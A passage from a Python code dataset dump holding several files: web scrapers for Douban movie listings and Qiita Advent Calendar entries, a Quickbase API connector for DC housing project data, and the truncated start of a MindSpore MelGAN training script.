Image.open(convert)\n\tfil = img.resize(newsize)\n\tfil.save(name +'.png', 'PNG')\n#---------------------------------------------------------------\ndec = input ('Image_Resizer\\n-------------\\nset name of resized files in quotes\\n\\n1. resize one picture\\n\\n')\n\nif dec is 1:\n\tone()\nelse:\n\tprint('Invalid')\n\n","sub_path":"image/img.py","file_name":"img.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118830421","text":"# -*- coding: utf-8 -*- \nimport urllib2\nimport re\nimport bs4\n\nheaders = ('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')\n\ndef get_sort_films(url):\n opener = urllib2.build_opener()\n opener.add_handler = headers\n content = opener.open(url).read().decode('utf-8')\n soup = bs4.BeautifulSoup(content)\n\n now_playing_film=soup.find('div' , {\"id\" : \"nowplaying\"}) # 获取正在上映电影\n\n list_content = now_playing_film.findAll('li', { \"class\" : \"list-item\" }) # 获取电影列表\n\n all_film_content = []\n\n for list_film in list_content:\n film_content = {}\n if (list_film.ul.li['class'] == ['poster']):\n film_content['film_name'] = list_film.ul.li.img['alt']\n film_content['film_release'] = list_film['data-release']\n film_content['film_actors'] = list_film['data-actors']\n film_content['film_director'] = list_film['data-director']\n film_content['film_href'] = list_film.ul.li.a['href']\n film_content['film_src'] = list_film.ul.li.a.img['src']\n if list_film.find('span', {'class','subject-rate'}):\n film_content['film_points'] = list_film.find('span', {'class','subject-rate'}).string.strip()\n if str(film_content['film_release']) == '2014':\n film_content['points'] = float(film_content['film_points'])+10\n else:\n film_content['points'] = float(film_content['film_points'])\n else:\n if str(film_content['film_release']) == '2014':\n film_content['points'] = 10\n else:\n film_content['points'] = 0\n film_content['film_points'] = u'暂无评分'\n\n stars = list_film.find('li', {'class' :'srating'}).span['class']\n\n if stars[0] != 'rating-star':\n film_content['film_stars'] = u'评价人数不足'\n else:\n original_film_stars=stars[1]\n re_film_stars=re.compile(r'^\\D*(\\d{2})$') # 用正则提取星数\n film_content['film_stars'] = str(int(re_film_stars.search(original_film_stars).groups()[0])/10)+'颗星'\n\n all_film_content.append(film_content)\n sort_all_film = sorted(all_film_content, key=lambda x:x['points'], reverse = True) # 将列表中字典元素按从大到小排列\n\n return sort_all_film\n","sub_path":"pyspider/douban_movie_spider2.py","file_name":"douban_movie_spider2.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363095671","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\n''' Qiita Advent Calendar\n'''\n\nimport os, sys, pprint, re, time, csv, json, math, copy\nimport urlparse\nimport requests\nfrom bs4 import BeautifulSoup\n# see: https://www.crummy.com/software/BeautifulSoup/bs4/doc/\n# see: http://kondou.com/BS4/\n\n\nclass adventCalendar(object):\n '''\n '''\n interval = 1\n verbose = True\n year = 2017\n url_base = 'https://qiita.com'\n max_calendar_page = 100\n max_calendar_per_page = 20\n\n def __init__(self, year=None, interval=None, verbose=None):\n '''\n '''\n if year is not None:\n self.year = year\n\n if interval is not None:\n self.interval = interval\n\n if verbose is not None:\n self.verbose = verbose\n\n\n def __del__(self):\n '''\n '''\n pass\n\n\n def log(self, message, force=False):\n '''\n '''\n if force is not True and self.verbose is not True:\n return\n sys.stderr.write(\"LOG : %s\\n\" % (message))\n\n\n def getWeb(self, url):\n '''\n '''\n time.sleep(self.interval)\n soup = None\n try:\n session = requests.Session()\n response = session.get(url)\n # response = requests.get(url)\n html = response.content\n soup = BeautifulSoup(html, 'html.parser')\n except:\n pass\n\n if response.status_code >= 400:\n self.log('Failure (response status code is %s) : get URL = %s' % (response.status_code, url), force=True)\n return None\n\n if soup is None:\n self.log('Failure : get URL = %s' % (url), force=True)\n return None\n\n self.log('Success : get URL = %s' % (url))\n return soup\n\n\n def getCalendar(self, code):\n ''' カレンダー情報 取得\n '''\n url = 'https://qiita.com/advent-calendar/%s/%s' % (self.year, code)\n soup = self.getWeb(url)\n result = []\n\n for row in soup.find_all('td', class_='adventCalendarCalendar_day'):\n # author = row.find('div', class_='adventCalendarCalendar_author').find('a')\n author = row.find('div', class_='adventCalendarCalendar_author')\n if author is None:\n # self.log('no author')\n continue\n\n author = author.find('a')\n if author is None:\n # self.log('no author')\n continue\n\n m = re.match('^/(.*)$', author.get('href'))\n if m is None:\n # self.log('no author name')\n continue\n user = m.group(1)\n\n comment = row.find('div', class_='adventCalendarCalendar_comment').find('a')\n if comment is None:\n # self.log('no comment')\n continue\n\n title = comment.text\n\n url = comment.get('href')\n url_parsed = urlparse.urlparse(url)\n\n if url_parsed.netloc in ['goo.gl', 't.co', 'bit.ly', 'is.gd', 'wp.me']:\n # 短縮 URL リダイレクト先 URL 取得\n url_redirected = None\n try:\n response = requests.get(url, allow_redirects=True)\n url_redirected = response.url\n except:\n pass\n\n if url_redirected is None:\n self.log('Failure : redirect URL = %s' % (url))\n continue\n\n url = url_redirected\n url_parsed = urlparse.urlparse(url)\n\n # ドメインを反転させて格納\n netloc_list = url_parsed.netloc.split('.')\n netloc_list.reverse()\n netloc_list.append('')\n domain_reversed = '.'.join(netloc_list)\n\n # io.github.\n if re.match('^io\\.github\\.', domain_reversed) is not None:\n domain_reversed = 'io.github.'\n\n # com.tumblr.\n if re.match('^com\\.tumblr\\.', domain_reversed) is not None:\n domain_reversed = 'com.tumblr.'\n\n # com.wordpress.\n if re.match('^com\\.wordpress\\.', domain_reversed) is not None:\n domain_reversed = 'com.wordpress.'\n\n # jp.kc-cloud.\n if re.match('^jp\\.kc-cloud\\.', domain_reversed) is not None:\n domain_reversed = 'jp.kc-cloud.'\n\n # com.blogspot.\n if re.match('^com\\.blogspot\\.', domain_reversed) is not None:\n domain_reversed = 'com.blogspot.'\n if re.match('^ca\\.blogspot\\.', domain_reversed) is not None:\n domain_reversed = 'com.blogspot.'\n if re.match('^jp\\.blogspot\\.', domain_reversed) is not None:\n domain_reversed = 'com.blogspot.'\n\n # hatena.d.\n if re.match('^com\\.hatenablog\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^com\\.hatenadiary\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^jp\\.hatenablog\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^jp\\.hatenadiary\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^jp\\.hateblo\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^com\\.hatena.d\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if domain_reversed == 'jp.ne.hatena.d.':\n domain_reversed = 'hatena.d.'\n if domain_reversed == 'jp.ne.hatena.blog.':\n domain_reversed = 'hatena.d.'\n\n # com.fc2.blog.\n if re.match('^com\\.fc2.blog\\.', domain_reversed) is not None:\n domain_reversed = 'com.fc2.blog.'\n if re.match('^com\\.fc2.blog\\d+\\.', domain_reversed) is not None:\n domain_reversed = 'com.fc2.blog.'\n\n # com.medium.\n if domain_reversed == 'com.medium.':\n url = self.formatMediumURL(url)\n\n item = {\n 'title': title,\n 'user': user,\n 'url': url,\n 'domain': domain_reversed,\n }\n # yield item\n result.append(item)\n\n return result\n\n\n def findCalendarList(self, page):\n ''' page 指定 カレンダー 情報 取得\n '''\n url = 'https://qiita.com/advent-calendar/%s/calendars?page=%s' % (self.year, page)\n soup = self.getWeb(url)\n\n result = []\n for row in soup.find_all('td', class_='adventCalendarList_calendarTitle'):\n a = row.find_all('a').pop()\n name = a.text\n code = None\n m = re.match('^/advent-calendar/(\\d+)/(.*)$', a.get('href'))\n if m is not None:\n code = m.group(2)\n result.append({\n 'name': name,\n 'code': code,\n 'url': '%s%s' % (self.url_base, a.get('href')),\n })\n\n return result\n\n\n def findCalendarListAll(self, with_item=False, with_count_hatena_bookmark=False):\n ''' 全 カレンダー 情報 取得\n '''\n result = []\n\n for page in range(1, self.max_calendar_page + 1):\n rows = self.findCalendarList(page)\n result.extend(rows)\n if len(rows) < self.max_calendar_per_page:\n self.log('page=%s' % (page))\n break\n\n if with_item is True:\n # 記事情報 付与\n for row in result:\n row['item'] = self.getCalendar(row['code'])\n\n if with_count_hatena_bookmark is True:\n # はてブ数 付与\n for row in result:\n row = self.setCountHatenaBookmarkOnCalendar(row)\n\n return result\n\n\n def countHatenaBookmark(self, params):\n ''' はてなブックマーク数 取得\n\n see: http://developer.hatena.ne.jp/ja/documents/bookmark/apis/getcount\n '''\n url = 'http://api.b.st-hatena.com/entry.counts'\n response = requests.get(url, params=params)\n return json.loads(response.content)\n\n\n def setCountHatenaBookmarkOnCalendar(self, row):\n ''' カレンダーと各記事の はてなブックマーク数 設定\n '''\n self.log('setCountHatenaBookmarkOnCalendar : code = %s' % (row['code']))\n\n # URL 抽出\n url_list = []\n url_list.append(row['url']) # カレンダー\n for item in row['item']:\n url_list.append(item['url']) # 記事\n\n # はてブ数\n result = self.countHatenaBookmark({'url': url_list})\n row['count'] = result[row['url']] # カレンダー\n for item in row['item']:\n item['count'] = result[item['url']] # 記事\n\n return row\n\n\n def formatMediumURL(self, url):\n ''' Medium URL 整形\n\n NOTE: はてなブックマーク が整形後の URL でカウントされている為\n\n https://medium.com/@nakanokyohei/%E5%AD%90%E4%BE%9B%E3%81%AB%E3%82%B9%E3%83%9E%E3%83%BC%E3%83%88%E3%83%95%E3%82%A9%E3%83%B3%E3%82%92%E4%B8%8E%E3%81%88%E3%81%9F%E8%A9%B1-8bc737220720\n -> https://medium.com/@nakanokyohei/8bc737220720\n\n https://medium.com/sotayamashita/glitch-github-%E3%81%A7%E7%B0%A1%E5%8D%98%E3%81%AB%E3%82%A2%E3%83%97%E3%83%AA%E3%82%92%E5%85%AC%E9%96%8B-b75af068ec46\n -> https://medium.com/sotayamashita/b75af068ec46\n\n # 独自ドメイン設定\n https://medium.com/p/8f11f33bfa96\n -> https://blog.kadoppe.com/%E5%AD%A6%E3%81%B3-%E3%81%AB%E3%83%95%E3%82%A9%E3%83%BC%E3%82%AB%E3%82%B9%E3%82%92%E3%81%82%E3%81%A6%E3%81%9F%E6%97%A5%E5%A0%B1%E3%81%AE%E3%82%88%E3%81%86%E3%81%AA%E3%82%82%E3%81%AE%E3%82%92%E5%8B%9D%E6%89%8B%E3%81%AB%E6%9B%B8%E3%81%84%E3%81%A6%E3%82%8B%E8%A9%B1-8f11f33bfa96\n '''\n # m = re.match('^https://medium.com/p/(\\w+)$', url)\n m = re.match('^https://medium.com/p/([0-9a-f]+)$', url)\n if m is not None:\n # リダイレクタ\n response = requests.get(url, allow_redirects=True)\n # self.log('LOG : com.medium. : %s => %s' % (url, response.url))\n return response.url\n\n m = re.match('^https://medium.com/(@?[a-zA-Z0-9_\\-\\.]+)/([0-9a-f]+)$', url)\n if m is not None:\n # 変換不要\n # self.log('OK : com.medium. : url = %s' % (url))\n return url\n\n # m = re.match('^https://medium.com/(@?[-\\.\\w]+)/(.*)-(\\w+)$', url)\n m = re.match('^https://medium.com/(@?[a-zA-Z0-9_\\-\\.]+)/(.*)-([0-9a-f]+)$', url)\n if m is None:\n self.log('NG : com.medium. : url = %s' % (url))\n raise Exception\n else:\n # self.log('OK : com.medium. : url = %s' % (url))\n url = 'https://medium.com/%s/%s' % (m.group(1), m.group(3))\n # self.log('OK : com.medium. : url = %s' % (url))\n\n return url\n\n","sub_path":"qiita.py","file_name":"qiita.py","file_ext":"py","file_size_in_byte":11069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316421034","text":"\"\"\"\nModule provides the api connection class for pulling DHCD DFD data\non projects pending funding and development\nfrom https://octo.quickbase.com/db/\nQuickbase API\n\"\"\"\n\n\nimport sys, os\nimport string\n\n# Enable relative package imports when running this file as a script (i.e. for testing purposes).\npython_filepath = os.path.abspath(os.path.join(os.path.dirname(__file__),\n os.pardir, os.pardir))\nsys.path.append(python_filepath)\n\n\nfrom collections import OrderedDict\n\nfrom xml.etree.ElementTree import Element, ElementTree\nfrom xml.etree.ElementTree import fromstring as xml_fromstring\n\nfrom xmljson import parker as xml_to_json\n\nimport json\n\n\nfrom housinginsights.sources.base_project import ProjectBaseApiConn\nfrom housinginsights.sources.models.dhcd import APP_ID, TABLE_ID_MAPPING, \\\n APP_METADATA_FIELDS, \\\n TABLE_METADATA_FIELDS, \\\n DhcdResult, \\\n PROJECT_FIELDS_MAP,\\\n SUBSIDY_FIELDS_MAP\n\nINCLUDE_ALL_FIELDS = True\n\n\nclass DhcdApiConn(ProjectBaseApiConn):\n \"\"\"\n API Interface to the DHCD DFD data on projects\n pending funding and development.\n\n Inherits from BaseApiConn class.\n \"\"\"\n\n BASEURL = 'https://octo.quickbase.com/db'\n\n PARAMS_METADATA = {'a': 'API_GetSchema'}\n\n PARAMS_DATA_ALL_FIELDS = {'a': 'API_DoQuery', 'query': '{\\'1\\'.XEX.\\'0\\'}', 'clist': 'a', 'slist': '3'}\n\n PARAMS_DATA_DEFAULT_FIELDS = {'a': 'API_DoQuery', 'query': '{\\'1\\'.XEX.\\'0\\'}'}\n\n\n def __init__(self):\n\n super().__init__(DhcdApiConn.BASEURL)\n\n # unique_data_id format: 'dhcd_dfd_' + \n self._available_unique_data_ids = [ 'dhcd_dfd_projects', \n 'dhcd_dfd_properties' #,\n# 'dhcd_dfd_units', 'dhcd_dfd_loans', 'dhcd_dfd_modifications',\n# 'dhcd_dfd_lihtc_allocations', 'dhcd_dfd_construction_activity',\n# 'dhcd_dfd_funding_sources', 'dhcd_dfd_8609s', 'dhcd_dfd_8610s',\n# 'dhcd_dfd_source_use', 'dhcd_dfd_ami_levels', 'dhcd_dfd_fiscal_years',\n# 'dhcd_dfd_organizations', 'dhcd_dfd_teams', 'dhcd_dfd_project_managers',\n# 'dhcd_dfd_funding_increases', 'dhcd_dfd_lihtc_fees',\n# 'dhcd_dfd_lihtc___bins', 'dhcd_dfd_council_packages',\n# 'dhcd_dfd_policies_and_procedures', 'dhcd_dfd_dhcd_documents',\n# 'dhcd_dfd_images_icons'\n ]\n self._app_dbid = APP_ID\n self._table_names = {\n 'dhcd_dfd_projects': 'Projects',\n 'dhcd_dfd_properties': 'Properties' #,\n# 'dhcd_dfd_units': 'Units',\n# 'dhcd_dfd_loans': 'Loans',\n# 'dhcd_dfd_modifications': 'Modifications',\n# 'dhcd_dfd_lihtc_allocations': 'LIHTC Allocations',\n# 'dhcd_dfd_construction_activity': 'Construction Activity',\n# 'dhcd_dfd_funding_sources': 'Funding Sources',\n# 'dhcd_dfd_8609s': '8609s',\n# 'dhcd_dfd_8610s': '8610s',\n# 'dhcd_dfd_source_use': 'Source/Use',\n# 'dhcd_dfd_ami_levels': 'AMI Levels',\n# 'dhcd_dfd_fiscal_years': 'Fiscal Years',\n# 'dhcd_dfd_organizations': 'Organizations',\n# 'dhcd_dfd_teams': 'Teams'\n# 'dhcd_dfd_project_managers': 'Project Managers',\n# 'dhcd_dfd_funding_increases': 'Funding Increases',\n# 'dhcd_dfd_lihtc_fees': 'LIHTC Fees',\n# 'dhcd_dfd_lihtc___bins': 'LIHTC - BINs',\n# 'dhcd_dfd_council_packages': 'Council Packages',\n# 'dhcd_dfd_policies_and_procedures': 'Policies and Procedures',\n# 'dhcd_dfd_dhcd_documents': 'DHCD Documents',\n# 'dhcd_dfd_images_icons': 'Images/Icons'\n }\n self._urls = { unique_data_id: '/' + TABLE_ID_MAPPING[self._table_names[unique_data_id]] \\\n for unique_data_id in self._available_unique_data_ids }\n print(\"self._urls:\")\n print(self._urls)\n\n identifier_unallowed_chars = string.punctuation + string.whitespace\n replacement_underscores = ''.join('_' * len(identifier_unallowed_chars))\n self._identifier_translation_map = str.maketrans(identifier_unallowed_chars, replacement_underscores)\n\n self._fields = {}\n self._params = {}\n\n if INCLUDE_ALL_FIELDS:\n self._get_metadata()\n else:\n self._get_metadata(default_display_only=True)\n\n\n def _get_metadata(self, default_display_only=False):\n \"\"\"\n Retrieves metadata about the DHCD DFD Quick Base app and its member tables\n (including field metadata and relationships) and saves this in two CSV files.\n\n Also, for each unique data id corresponding to a table, (1) builds a field\n reference list of all relevant fields, and (2) sets the query parameter string\n (including the sort field parameter) used when saving table data in get_data(...).\n\n :param default_display_only: Indicates whether or not to only include default\n display fields in the field reference list;\n default is False (gets all available table fields).\n :type default_display_only: Boolean.\n \"\"\"\n output_path_dir = os.path.dirname(self.output_paths[self._available_unique_data_ids[0]])\n output_path_app_metadata = os.path.join(output_path_dir, '_dhcd_dfd_app_metadata.csv')\n output_path_table_metadata = os.path.join(output_path_dir, '_dhcd_dfd_table_metadata.csv')\n\n app_metadata_result = self.get('/' + self._app_dbid, params=DhcdApiConn.PARAMS_METADATA)\n app_tables_metadata_xml = xml_fromstring(app_metadata_result.text).findall('./table/chdbids/chdbid')\n\n app_metadata = OrderedDict()\n table_metadata = OrderedDict()\n field_count = 0\n for app_table_metadata in app_tables_metadata_xml:\n\n table_dbid = app_table_metadata.text\n\n table_metadata_result = self.get('/' + table_dbid, params=DhcdApiConn.PARAMS_METADATA)\n # Strip out singly-occurring line break tags to prevent truncation of multi-line formulas\n table_metadata_full = table_metadata_result.text.replace(\"
\\n
\", \"
\\n
\")\n table_metadata_full = table_metadata_result.text.replace(\"
\", \"\")\n table_metadata_xml_root = xml_fromstring(table_metadata_full)\n errcode = int(table_metadata_xml_root.find('./errcode').text)\n if errcode == 0:\n table_metadata_xml_orig = table_metadata_xml_root.find('./table/original')\n table_name = table_metadata_xml_root.find('./table/name').text\n table_name_snake_case = table_name.lower().translate(self._identifier_translation_map)\n unique_data_id = None\n if 'dhcd_dfd_'+table_name_snake_case in self._available_unique_data_ids:\n unique_data_id = 'dhcd_dfd_' + table_name_snake_case\n self._fields[unique_data_id] = []\n\n table_metadata_xml_fields = table_metadata_xml_root.findall('./table/fields/field')\n table_metadata[table_dbid] = OrderedDict()\n field_line_start = field_count + 2\n\n for field_xml in table_metadata_xml_fields:\n\n fid = int(field_xml.get('id'))\n table_metadata[table_dbid][fid] = OrderedDict()\n\n field_label = field_xml.find('label').text\n field_name = field_label.lower().translate(self._identifier_translation_map)\n\n # For any fields that belong to composite fields (e.g. address component fields),\n # resolve the full field name by prepending the parent field name\n parent_fid = None\n if field_xml.find('parentFieldID') is not None:\n parent_fid = int(field_xml.find('parentFieldID').text)\n if parent_fid in table_metadata[table_dbid]:\n parent_field_name = table_metadata[table_dbid][parent_fid]['field_name']\n else:\n parent_field_label = table_metadata_xml_root.find(\"./table/fields/field[@id='{}']/label\".format(str(parent_fid))).text\n parent_field_name = parent_field_label.lower().translate(self._identifier_translation_map)\n if parent_field_name[0].isdigit():\n parent_field_name = '_' + parent_field_name\n field_name = '__'.join([parent_field_name, field_name])\n\n if field_name[0].isdigit():\n field_name = '_' + field_name\n\n # For any composite fields (e.g. address fields), get child/component fields\n child_fids = []\n for child_field in field_xml.findall('./compositeFields/compositeField'):\n child_fids.append(child_field.get('id'))\n child_fids = '|'.join(child_fids) if len(child_fids) > 0 else None\n\n table_metadata[table_dbid][fid]['table_name'] = table_name\n table_metadata[table_dbid][fid]['field_name'] = field_name\n table_metadata[table_dbid][fid]['field_label'] = field_label\n table_metadata[table_dbid][fid]['field_id'] = str(fid)\n table_metadata[table_dbid][fid]['field_type'] = field_xml.get('field_type')\n table_metadata[table_dbid][fid]['base_type'] = field_xml.get('base_type')\n table_metadata[table_dbid][fid]['appears_by_default'] = field_xml.find('appears_by_default').text\n\n table_metadata[table_dbid][fid]['composite_field_parent_fid'] = parent_fid\n table_metadata[table_dbid][fid]['composite_field_child_fids'] = child_fids\n\n table_metadata[table_dbid][fid]['mode'] = field_xml.get('mode')\n\n table_metadata[table_dbid][fid]['formula'] = None\n if field_xml.find('formula') is not None:\n table_metadata[table_dbid][fid]['formula'] = field_xml.find('formula').text\n\n table_metadata[table_dbid][fid]['choices'] = None\n if field_xml.find('choices') is not None:\n table_metadata[table_dbid][fid]['choices'] = \"\"\n for choice in field_xml.findall('./choices/choice'):\n table_metadata[table_dbid][fid]['choices'] += \"\\n\" + choice.text \\\n if len(table_metadata[table_dbid][fid]['choices']) > 0 \\\n else choice.text\n\n table_metadata[table_dbid][fid]['lookup_target_fid'] = None\n table_metadata[table_dbid][fid]['lookup_source_fid'] = None\n if table_metadata[table_dbid][fid]['mode'] == 'lookup':\n if field_xml.find('lutfid') is not None:\n table_metadata[table_dbid][fid]['lookup_target_fid'] = field_xml.find('lutfid').text\n if field_xml.find('lusfid') is not None:\n table_metadata[table_dbid][fid]['lookup_source_fid'] = field_xml.find('lusfid').text\n\n table_metadata[table_dbid][fid]['dblink_target_dbid'] = None\n table_metadata[table_dbid][fid]['dblink_target_fid'] = None\n table_metadata[table_dbid][fid]['dblink_source_fid'] = None\n if table_metadata[table_dbid][fid]['mode'] == 'virtual' and \\\n table_metadata[table_dbid][fid]['field_type'] == 'dblink':\n if field_xml.find('target_dbid') is not None:\n table_metadata[table_dbid][fid]['dblink_target_dbid'] = field_xml.find('target_dbid').text\n if field_xml.find('target_fid') is not None:\n table_metadata[table_dbid][fid]['dblink_target_fid'] = field_xml.find('target_fid').text\n if field_xml.find('source_fid') is not None:\n table_metadata[table_dbid][fid]['dblink_source_fid'] = field_xml.find('source_fid').text\n table_metadata[table_dbid][fid]['fkey_table_app_dbid'] = None\n table_metadata[table_dbid][fid]['fkey_table_alias'] = None\n if field_xml.find('mastag') is not None:\n fkey_ref = field_xml.find('mastag').text.split('.')\n if len(fkey_ref) == 2:\n table_metadata[table_dbid][fid]['fkey_table_app_dbid'] = fkey_ref[0]\n table_metadata[table_dbid][fid]['fkey_table_alias'] = fkey_ref[1].lower()\n else:\n table_metadata[table_dbid][fid]['fkey_table_app_dbid'] = None\n table_metadata[table_dbid][fid]['fkey_table_alias'] = fkey_ref[0].lower()\n\n table_metadata[table_dbid][fid]['field_help'] = field_xml.find('fieldhelp').text\n\n # For each unique data id corresponding to a table,\n # build a list of all relevant fields\n if unique_data_id is not None and \\\n (not default_display_only or \\\n table_metadata[table_dbid][fid]['appears_by_default'] == '1'):\n self._fields[unique_data_id].append(field_name)\n\n field_count += 1\n\n field_line_end = field_count + 1\n\n app_metadata[table_dbid] = OrderedDict([\n\t\t\t\t\t ('table_name', table_name),\n ('table_dbid', table_dbid),\n ('table_alias', app_table_metadata.get('name')),\n ('key_fid', table_metadata_xml_orig.find('key_fid').text),\n ('default_sort_fid', table_metadata_xml_orig.find('def_sort_fid').text),\n ('default_sort_order', table_metadata_xml_orig.find('def_sort_order').text),\n ('single_record_name', table_metadata_xml_orig.find('single_record_name').text),\n ('plural_record_name', table_metadata_xml_orig.find('plural_record_name').text),\n ('field_metadata_line_start', field_line_start),\n ('field_metadata_line_end', field_line_end)\n ])\n\n if unique_data_id is not None and unique_data_id in self._fields:\n # While not strictly a field, Quick Base always includes final 'update_id':\n self._fields[unique_data_id].append('update_id')\n # Set the query parameter string (including the sort field parameter):\n if not default_display_only:\n self._params[unique_data_id] = DhcdApiConn.PARAMS_DATA_ALL_FIELDS\n else:\n self._params[unique_data_id] = DhcdApiConn.PARAMS_DATA_DEFAULT_FIELDS\n self._params[unique_data_id]['slist'] = app_metadata[table_dbid]['default_sort_fid']\n\n all_tables_field_metadata = [ list(field_metadata_row.values()) \\\n for all_field_metadata in table_metadata.values() \\\n for field_metadata_row in all_field_metadata.values() ]\n self.result_to_csv(TABLE_METADATA_FIELDS, all_tables_field_metadata, output_path_table_metadata)\n self.result_to_csv(APP_METADATA_FIELDS, list(list(d.values()) for d in app_metadata.values()), output_path_app_metadata)\n\n\n def get_data(self, unique_data_ids=None, sample=False, output_type='csv', **kwargs):\n \"\"\"\n Returns a JSON object of the entire data set.\n\n \"\"\"\n data_json = None\n db = kwargs.get('db', None)\n\n if unique_data_ids is None:\n unique_data_ids = self._available_unique_data_ids\n\n for u in unique_data_ids:\n if (u not in self._available_unique_data_ids):\n logging.info(\" The unique_data_id '{}' is not supported by the DhcdApiConn\".format(u))\n\n else:\n result = self.get(self._urls[u], params=self._params[u])\n\n if result.status_code != 200:\n err = \"An error occurred during request: status {0}\"\n raise Exception(err.format(result.status_code))\n\n data_xml_root = xml_fromstring(result.text)\n data_xml_records = data_xml_root.findall('record')\n data_json = xml_to_json.data(data_xml_root)\n\n if output_type == 'stdout':\n print(json.dumps(data_json, indent=4))\n\n elif output_type == 'csv':\n\n results = [ DhcdResult({e.tag: e.text for e in list(r)}, self._fields[u]).data for r in data_xml_records ]\n\n self.result_to_csv(self._fields[u], results, self.output_paths[u])\n \n #Convert to format expected by database\n if u == 'dhcd_dfd_properties':\n self.create_project_subsidy_csv('dhcd_dfd_properties', PROJECT_FIELDS_MAP, SUBSIDY_FIELDS_MAP, db)\n\n\n\n\n# For testing purposes (running this as a script):\nif __name__ == '__main__':\n d = DhcdApiConn()\n\n# unique_data_ids = ['dhcd_dfd_projects']\n unique_data_ids = None\n sample = False\n\n# output_type = 'stdout'\n output_type = 'csv'\n db = None\n\n d.get_data(unique_data_ids, sample, output_type, db=db)\n\n\n","sub_path":"python/housinginsights/sources/dhcd.py","file_name":"dhcd.py","file_ext":"py","file_size_in_byte":19145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32354588","text":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"MelGAN train\"\"\"\nimport time\nimport os\n\nimport mindspore.nn as nn\nfrom mindspore.common import set_seed\nimport mindspore.common.dtype as mstype\nfrom mindspore.common.tensor import Tensor\nfrom mindspore.context import ParallelMode\nfrom mindspore.communication.management import init, get_rank, get_group_size\nimport mindspore.dataset as de\nimport mindspore.context as context\nfrom mindspore.train.loss_scale_manager import DynamicLossScaleManager\nfrom mindspore.train.callback import RunContext, ModelCheckpoint, CheckpointConfig, _InternalCallbackParam\nfrom mindspore.train.serialization import load_checkpoint, load_param_into_net\n\nfrom src.model_utils.config import config as cfg\nfrom src.model import MultiDiscriminator, Generator\nfrom src.trainonestep import TrainOneStepCellGEN, TrainOneStepCellDIS\nfrom src.loss import MelganLoss_G, MelganLoss_D\nfrom src.dataset import Generator1D\nfrom src.sampler import DistributedSampler\nfrom src.model_utils.moxing_adapter import moxing_wrapper\n\nset_seed(1)\n\nclass BuildGenNetwork(nn.Cell):\n \"\"\"build generator\"\"\"\n def __init__(self, network, criterion):\n super(BuildGenNetwork, self).__init__(auto_prefix=False)\n self.network = network\n self.criterion = criterion\n def construct(self, data):\n fake_wav = self.network(data)\n return fake_wav\n\nclass BuildDisNetwork(nn.Cell):\n \"\"\"build discriminator\"\"\"\n def __init__(self, network, criterion):\n super(BuildDisNetwork, self).__init__(auto_prefix=False)\n self.network = network\n self.criterion = criterion\n\n def construct(self, fake_wav, wav):\n y1 = self.network(fake_wav)\n y2 = self.network(wav)\n loss = self.criterion(y1, y2)\n return loss\n\n@moxing_wrapper()\ndef train():\n \"\"\"main train process\"\"\"\n # init distributed\n if cfg.run_distribute:\n device_id = int(os.getenv('DEVICE_ID', '0'))\n context.set_context(mode=context.GRAPH_MODE, device_target=\"Ascend\", device_id=device_id)\n init()\n cfg.rank = get_rank()\n cfg.group_size = get_group_size()\n context.reset_auto_parallel_context()\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True, device_num=8,\n parameter_broadcast=True)\n else:\n cfg.rank = 0\n cfg.group_size = 1\n context.set_context(mode=context.GRAPH_MODE, device_target=\"Ascend\", device_id=cfg.device_id)\n # get network and init\n net_D = MultiDiscriminator()\n net_G = Generator(alpha=cfg.leaky_alpha)\n\n criterion_G = MelganLoss_G()\n criterion_D = MelganLoss_D()\n\n gen_network_train = BuildGenNetwork(net_G, criterion_G)\n gen_network_train.set_train()\n dis_network_train_1 = BuildDisNetwork(net_D, criterion_G)\n dis_network_train_1.set_train()\n dis_network_train_2 = BuildDisNetwork(net_D, criterion_D)\n dis_network_train_2.set_train()\n scale_manager = DynamicLossScaleManager(init_loss_scale=2 ** 10, scale_factor=2, scale_window=2000)\n\n # optimizer\n opt_G = nn.Adam(params=net_G.trainable_params(), learning_rate=cfg.lr_g, beta1=cfg.beta1, beta2=cfg.beta2,\n weight_decay=cfg.weight_decay)\n opt_D = nn.Adam(params=net_D.trainable_params(), learning_rate=cfg.lr_d, beta1=cfg.beta1, beta2=cfg.beta2,\n weight_decay=cfg.weight_decay)\n if cfg.pre_trained:\n param_dict = load_checkpoint(cfg.checkpoint_path)\n load_param_into_net(net_G, param_dict)\n load_param_into_net(net_D, param_dict)\n\n gen_network_train_wrap = TrainOneStepCellGEN(gen_network_train, opt_G, dis_network_train_1, criterion_G)\n dis_network_train_wrap = TrainOneStepCellDIS(gen_network_train, dis_network_train_2, opt_D, criterion_D)\n\n # dataloader\n Wavmeldataset = Generator1D(cfg.data_path, cfg.train_length, cfg.hop_size)\n distributed_sampler = DistributedSampler(len(Wavmeldataset), cfg.group_size, cfg.rank, shuffle=True)\n dataset = de.GeneratorDataset(Wavmeldataset, [\"data\", \"wav\", \"datad\", \"wavd\"], sampler=distributed_sampler)\n dataset = 